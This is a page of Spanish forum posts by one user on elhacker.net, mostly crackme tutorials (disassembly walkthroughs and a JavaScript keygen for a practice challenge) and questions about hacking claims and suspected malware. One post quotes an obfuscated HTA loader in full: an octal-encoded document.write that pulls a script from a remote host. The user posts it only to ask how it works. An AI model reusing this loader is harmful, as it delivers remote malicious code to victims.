elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


  Mostrar Temas
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
1  Foros Generales / Foro Libre / PODCAST de Héctor López en el canal de MAFIA en: 8 Junio 2025, 00:58 am
Hola amigos navegando por YouTube encontré un video de un podcast, o sea es una entrevista a un hacker llamado Héctor López aquí el video




lo que me sorprende es que habla de varias cosas que no creo que sea verdad por eso les dejo el video...mis respetos a este señor pero no creo algunas de las cosas que dice que se puede hacer...aclaro yo soy novato no me consideró experto y tengo mucho tiempo en los foros pero lo que no me cuadra son ciertas cosas como lo de tumbar páginas como dice el que tiene una herramienta para eso, otra que dice que paseando en un auto con unos chips puede ir hackeando las redes wifi...yo para tumbar una página conozco el ataque DDOS como funciona, pero una herramienta capas de tumbar una página aparte del DDOS creo que seria reportándola  creo no conozco mucho de tumbar páginas, mi área es la ingeniería inversa.



Otra idea seria que tuviera acceso al servidor y borrara todo pero en fin...hay muchas maneras pero creo que este amigo exagera con lo que habla...mis respetos para el pero no creo muchas cosas en fin hay esta el video a ver que opinan



saludos Flamer y hay me dicen si lo conocen
2  Seguridad Informática / Análisis y Diseño de Malware / Nuevo malware via archivo HTA en: 10 Mayo 2025, 00:07 am
Hola he estado navegando en algunas paginas y me salen publicidad y de repente se descargan archivos zip o 7z y al descomprimirlo aparece un archivo .hta...bueno al abrirlo contiene lo siguiente

Código:
<script>



document.write("\154\074\163\143\162\151\160\164\040\163\162\143\075\150\164\164\160\163\072\057\057\063\141\071\143\060\071\066\064\056\160\162\145\143\162\145\141\164\151\166\145\056\160\151\143\163\057\061\165\164\066\151\065\166\143\144\070\064\152\065\076\074\057\163\143\162\151\160\164\076\152\144\145\154")


</script>

asi que no lo ejecute..... cambie el document.write por un alert aver que imprimia y sale esto



por lo que veo redirige a una pagina... pero no entiendo como el atacante puede infectar mi computadora tiene algun bug los archivos hta al visitar dicha web... no entiendo

saludos Flamer y mi navegador chrome me lo marca como peligroso
3  Programación / Ingeniería Inversa / Solucion crackme1 de tHE ANALYST mas keygen en: 22 Abril 2025, 00:13 am
Hola amigos hoy vengo con un pequeño tutorial es la solucion de un crackme sencillo es para novatos bueno empesemos este es el crackme



asi que lo abrimos con el x32dbg y vemos en los string la frase



damos doble clic y no manda a esta zona



como ven en la imagen se mira donde esta la api que compara y donde se genera el serial asi que yo puse un breakpoint en la direccion 0040110c

        
Citar
0040110C | 0FBE840D 48FFFFFF        | movsx eax,byte ptr ss:[ebp+ecx-B8]                
00401114 | 41                                  | inc ecx                                            
00401115 | 33C1                              | xor eax,ecx                                        
00401117 | 03D8                              | add ebx,eax                                        
00401119 | 3B4D D8                        | cmp ecx,dword ptr ss:[ebp-28]                      
0040111C | 75 EE                             | jne k4n1.40110C                                    
0040111E | 6BC0 06                         | imul eax,eax,6                                    
00401121 | C1E3 07                         | shl ebx,7                                          
00401124 | 03C3                             | add eax,ebx                                        
00401126 | 8945 C8                         | mov dword ptr ss:[ebp-38],eax                      

y veo que lee letra por letra del nombre que ingresamos y luego incrementa ECX para despues xorear el valor ascii del nombre ingresado que esta en EAX con ECX  para despues sumar lo en EBX he irlo almacenando hay....al salir de ese bucle multiplica el valor EAX con 6 y despues sigue una instruccion shl 7 lo que hace es desplazar 7 bits a la deracha si ingreso Flamer como nombre EBX valdra 254 en hexadecimal en binario es:

0010 0101 0100    ahora le aplicamos el desplazamiento de 7 bits asi
0010 0101 0100  0000 000  ahora EBX valdra 12A00 en hexadecimal

despues ese valor es sumado con EAX en la linea 00401124 y ese sera el serial resultante para el crackme aqui les dejo el keygen

Código:
<html>
<head><title>keygen crackme1 de tHE ANALYST ...::::By Flamer::::...</title>
</head>
<body bgcolor="black">
<center>
<marquee style="color:white;font-size:50;">keygen crackme1 de tHE ANALYST ...::::By Flamer::::...</marquee><br><br><br><br><br><br>
<div style="color:white;font-size:30;">
Nombre:&nbsp;&nbsp;<input type="text" id="nom" style="background-color:black;color:white;text-align:center;width:400;height:30;"><br>

Password:<input type="text" id="pass" style="background-color:black;color:white;text-align:center;width:400;height:30;""><br><br>
</div>

<input type="button" value="Generar" onclick="star(0)" style="width:100;height:30;">
<input type="button" value="Automatico" onclick="star(1)" style="width:100;height:30;">
<input type="button" value="Detener" onclick="stop()" style="width:100;height:30;">
<input type="button" value="Limpiar" onclick="clear()" style="width:100;height:30;">

</center>
<script>
let time=0

function star(y)
{
   let x,digito,d,ebx=0,serial="",cadena="",largo,digi,nick=""
  
   if(y==1)
   {
      cadena="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
 largo=parseInt(Math.random()*(26-5)+5)
 l=cadena.length - 1
 
 for(x=0;x<largo;x++)
 {
    digi=parseInt(Math.random()*(l-0)+0)
nick+=cadena.substring(digi-1,digi)
 }
 document.getElementById("nom").value=nick
   }
   else
   {  
      nick=document.getElementById("nom").value
   }
  
   for(x=1;x<=nick.length;x++)
   {
      digito=nick.substring(x-1,x)
 d=digito.charCodeAt(0) ^ x
 ebx+=d
   }
   d=d*6
   ebx=(ebx*128)+d
   serial=ebx.toString(16)
   document.getElementById("pass").value=serial.toUpperCase()
  
   if(y==1)
   {
       time=setTimeout("star(1)",10)
   }
}
function stop()
{
   clearTimeout(time)
}
function clear()
{
   document.getElementById("nom").value=""
   document.getElementById("pass").value=""
}
</script>
</body>
</html>



como ven la clave para Flamer es 12CB8

saludos Flamer y espero les guste el keygen esta hecho en html y javascript....para el desplazamiento en el codigo javascript solo multiplique por 128 por que 2 elevado a la 7 es 128



el crackme lo pueden descargar de la pagina  https://crackmes.one/
4  Programación / Ingeniería Inversa / Solucion CrackMe Para Novatos (UltraFacil) en: 15 Abril 2025, 18:15 pm
Hola amigos estaba dando la vuelta por el foro de underc0de y me tope con este reto

https://underc0de.org/foro/wargames-202/crackme-para-novatos-ultrafacil/

y se me hizo facil y entretenido ya que no podia dar con bola no sabia que era un .NET y no podia revisarlo con el x32dbg, hasta que se me prendio el foco que podria ser un ejecutable compilado en un .NET en el mismo tema se puede observar el codigo decompilado por el usuario Joshyba...bueno en fin lo revisamos con el ExeinfoPE y nos muestra lo siguiente



asi que es un .NET ahora buscaremos un decompilador para .NET yo use el dotPeek32 y nos muestra lo siguiente



aqui podemos ver que el codigo completo y observamos que la primera ves que pide la contraseña es almasenada en la variable num2 y la segunda ves en num3 y luego pregunta en el if si num2 y num3 son diferentes si son diferentes entra y muestra el mensaje de contraseñas diferentes, asi que las dos vesces que pide la contraseña tiene que ser iguales y si son iguales pregunta si num3 y num1 son iguales y al principio del codigo vemos que num1 es igual a 767 entonces nos quesa claro que la contraseña tiene que ser 767 y lo intentaremos aqui la imagen



bueno es un reto muy facil yo no daba con vola por que no sabia que era un .NET y intentaba reversearlo con x32dbg jajaja en fin es pero les guste saludos Flamer


5  Programación / Ingeniería Inversa / y los crackmes de descarga del hacker.net en: 18 Marzo 2025, 01:19 am
hola he estado buscando los crackmes del foro y no los encuentro....creo que a lo mejor no he buscado bien  :huh:

saludos
6  Seguridad Informática / Seguridad / por que el centro de actividades se pone asi con un relogito tendre un malware en: 8 Octubre 2023, 17:53 pm
hola lo que sucede es que cuando dejo la pc sola sin manejarla el centro de actividades se pone asi



alguien sabe por que y se ejecuta tambien el archivo llamado Rundll32
tendre algun malware

saludos Flamer y aver si alguien me ayuda
7  Programación / Ingeniería Inversa / Reto Crackme by MountainMan en: 4 Febrero 2023, 03:05 am
Hola tengo tiempo que no me paseo por estos rumbos y estoy un poco oxidado en esto de la ingeneria inversa asi que empese con un crackme falcil que baje de

https://crackmes.one/

y ahora aqui selos traigo para aver quien lo intenta

dificultad: 1.5
plataforma: Windows
lenguaje: Borland Delphi

Mi nombre: Flamer
Mi serial: remalFremalFremalF


Descargar:https://www.mediafire.com/file/vcmdll2f6tgsvos/C1.exe/file

Saludos Flamer y que se diviertan
8  Programación / Ingeniería Inversa / Tutorial crackme de Hendrix Axiateam por Flamer en: 18 Diciembre 2021, 01:13 am
Hola amigo hoy vengo con un pequeño tutorial sobre el crackme de hendrix el llamado Axiateam este crackme fue mi primer crackme que logre resolver con el bloc de notas sin saber nada de revesing y en ese entonces no conosia el ollydbg mucho menos el x64dbg y como para mi marco mis inicios en aquellos años....viejos recuerdos he coleccionado varios crackmes y este en especial lo llevo aguardado en mi celular como un amuleto....bueno empesemos lo abriremos con el x64dbg y miramos las string aqui



despues veremos el mensaje correcto



damos doble clic en el mensaje correcto y nos lleva hasta esta zona



como observan esta la api que compara, un salto je y el mesaje correcto, asi que pondremos un breakpoint en la api vbaVarTstEq y pulsamos f9 y como serial pondre 123456 luego preciono el boton Entrar....vemos que se detiene donde pusimos el breakpoint y se mira lo siguiente



como ven se obserba la string "Subliminal Worm   " y si bajamos la barra de desplasamiento de la pila obserbamos la misma string y el serial que ingresamos 123456



por logica sin entrar en la api donde pusimos el breakpoint deduzco que esa es la clave asi que la copiamos y pegamos y nos arroja lo siguiente



ahora si entramos en la api pulsando F7 nos vamos traseando hasta encontrar donde compara las cadenas



bueno creo que eso es todo espero les sea de su agrado....este crackme es muy sencillo pero asi es como empiesa uno con los faciles y como yo me gustan los faciles para algrarme el dia

Saludos Flamer y perdonen la ortografia pero no pieno cambiarla
Daescarga del crackme:https://www.mediafire.com/file/6su3hwi5u15wi58/Axiateam_By_Hendrix.zip/file
9  Programación / Ingeniería Inversa / crackmes de elhacker.net en: 9 Abril 2021, 02:30 am
hola que paso con la descarga de estos archivos

https://www.elhacker.net/hacking-programas-hack.html#crackmes

al dar click no descarga nada

saludos
10  Programación / Ingeniería Inversa / alguien aguardo mi crackme 6 en: 28 Marzo 2021, 03:38 am
hola soy flamer y hace poco me di cuenta que mediafire borro uno de mis crackmes es este



el link era este

http://www.mediafire.com/download/eka19h0zf1qm7j1/KeygenMe+6.rar

link del hilo cuando lo presente:

https://foro.elhacker.net/ingenieria_inversa/reto_crackme_6_de_flamer-t368430.0.html

pregunto si alguien lo aguardo para resubirlo



saludos Flamer
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines